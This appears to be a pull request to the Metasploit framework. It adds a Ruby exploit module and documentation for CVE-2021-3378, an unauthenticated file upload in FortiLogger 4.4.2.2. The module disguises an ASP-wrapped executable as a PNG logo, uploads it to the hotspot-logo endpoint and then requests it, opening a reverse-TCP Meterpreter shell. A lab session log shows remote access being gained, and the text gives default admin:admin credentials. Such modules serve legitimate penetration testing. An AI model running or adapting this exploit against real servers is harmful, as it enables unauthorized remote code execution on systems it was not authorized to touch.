### PR TITLE
Adding FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (CVE-2021-3378)

### DIFF
--- a/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
+++ b/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+
+FortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls,
+running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering,
+reporting and hotspot.
+
+This module exploits an unauthenticated arbitrary file upload via insecure `POST` request on company logo upload
+for hotspot settings of FortiLogger 4.4.2.2.
+
+You can download installation file from following url:
+https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip
+
+*(Vendor has removed vulnerable version from web page of vendor for download.)*
+
+### Prerequisites
+
+1. Start a Windows VM *(Tested on Windows 10 Enterprise)*
+2. Install a vulnerable version which is 4.4.2.2 of FortiLogger via above url. *(Vendor has removed this version on
+   their web page)*
+3. After installation, verify that the server is working by visiting it with a browser.
+    - Default port: 5000
+    - Default username:password - admin:admin
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+2. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
+3. Set `RHOSTS`
+4. Do: `run` or `exploit`
+5. **Verify** that `The target is vulnerable.` message appeared
+6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded !`
+7. **Verify** that you getting a meterpreter session.
+
+## Options
+
+1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger 4.4.2.2 is running on it.
+2.  `RPORT`. Default port number is `5000`.
+
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/http/fortilogger_arbitrary_fileupload 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options 
+
+Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      5000             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the FortiLogger
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.46     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   FortiLogger - 4.4.2.2
+
+
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 192.168.16.128
+rhosts => 192.168.16.128
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
+
+[*] Started reverse TCP handler on 192.168.1.46:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[+] Generate Payload !
+[+] Payload has been uploaded !
+[*] Executing payload...
+[*] Sending stage (175174 bytes) to 192.168.1.46
+[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.46:59563) at 2021-03-01 00:40:26 +0300
+
+meterpreter > getuid
+Server username: DESKTOP-QFNKFIO\brkn
+meterpreter > sysinfo 
+Computer        : DESKTOP-QFNKFIO
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > pwd
+C:\Program Files\RZK\Fortilogger\App
+meterpreter > 
+
+
+```
+
+## Reference
+1. https://erberkan.github.io/2021/cve-2021-3378/

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -1,0 +1,133 @@
+require 'csv'
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FortiLogger Arbitrary File Upload Exploit',
+        'Description' => %q{
+            This module exploits an unauthenticated arbitrary file upload
+            via insecure POST request. It has been tested on version 4.4.2.2 in
+            Windows 10 Enterprise.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Berkan Er <b3rsec@protonmail.com>'
+          ],
+        'References' =>
+          [
+            [ 'URL', 'http://erberkan.github.io']
+          ],
+
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Targets' =>
+          [
+            ['FortiLogger - 4.4.2.2', {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86
+            }],
+          ],
+
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
+      ], self.class
+    )
+  end
+
+  def check_product_info()
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
+      'method' => 'POST',
+      'data' => '',
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Accept-Encoding' => 'gzip, deflate',
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    )
+
+    return res
+  end
+
+  def check
+    begin
+      res = check_product_info
+      if res && res.code == 200
+        vprint_status("Status: #{res.code}")
+        if JSON.parse(res.body)['Version'] == '4.4.2.2'
+          vprint_status((JSON.parse(res.body)['Version']).to_s)
+          Exploit::CheckCode::Vulnerable
+        else
+          Exploit::CheckCode::Safe
+        end
+      end
+    end
+  end
+
+  def create_payload
+    exe = generate_payload_exe
+    asp = Msf::Util::EXE.to_exe_asp(exe).to_s
+
+    return asp
+  end
+
+  def exploit
+    begin
+      print_good('Generate Payload !')
+      data = create_payload
+
+      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
+      post_data = "--#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n"
+      post_data << "Content-Type: image/png\r\n"
+      post_data << "\r\n#{data}\r\n"
+      post_data << "--#{boundary}\r\n"
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'data' => post_data,
+        'headers' => {
+          'Accept' => 'application/json',
+          'Accept-Language' => 'en-US,en;q=0.5',
+          'X-Requested-With' => 'XMLHttpRequest'
+        }
+      )
+      if res && res.code == 200
+        print_good('Payload has been uploaded !')
+
+        handler
+
+        print_status("Executing payload...")
+        send_request_cgi({
+          'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+          'method' => 'GET'
+        }, 5)
+
+      end
+    end
+  end
+end


### PR DESCRIPTION
## Vulnerable Application

FortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls,
running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering,
reporting and hotspot.

This module exploits an unauthenticated arbitrary file upload via insecure `POST` request on company logo upload
for hotspot settings of FortiLogger 4.4.2.2.

You can download installation file from following url:
https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip

*(Vendor has removed vulnerable version from web page of vendor for download.)*

### Prerequisites

1. Start a Windows VM *(Tested on Windows 10 Enterprise)*
2. Install a vulnerable version which is 4.4.2.2 of FortiLogger via above url. *(Vendor has removed this version on
   their web page)*
3. After installation, verify that the server is working by visiting it with a browser.
    - Default port: 5000
    - Default username:password - admin:admin


## Verification Steps

1. Install the application
1. Start msfconsole
2. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
3. Set `RHOSTS`
4. Do: `run` or `exploit`
5. **Verify** that `The target is vulnerable.` message appeared
6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded !`
7. **Verify** that you getting a meterpreter session.

## Options

1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger 4.4.2.2 is running on it.
2.  `RPORT`. Default port number is `5000`.


## Scenarios

```
msf6 > use exploit/windows/http/fortilogger_arbitrary_fileupload 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options 

Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the FortiLogger
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.46     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   FortiLogger - 4.4.2.2


msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 192.168.16.128
rhosts => 192.168.16.128
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[+] Generate Payload !
[+] Payload has been uploaded !
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.46
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.46:59563) at 2021-03-01 00:40:26 +0300

meterpreter > getuid
Server username: DESKTOP-QFNKFIO\brkn
meterpreter > sysinfo 
Computer        : DESKTOP-QFNKFIO
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > 


```

## Reference
1. https://erberkan.github.io/2021/cve-2021-3378/
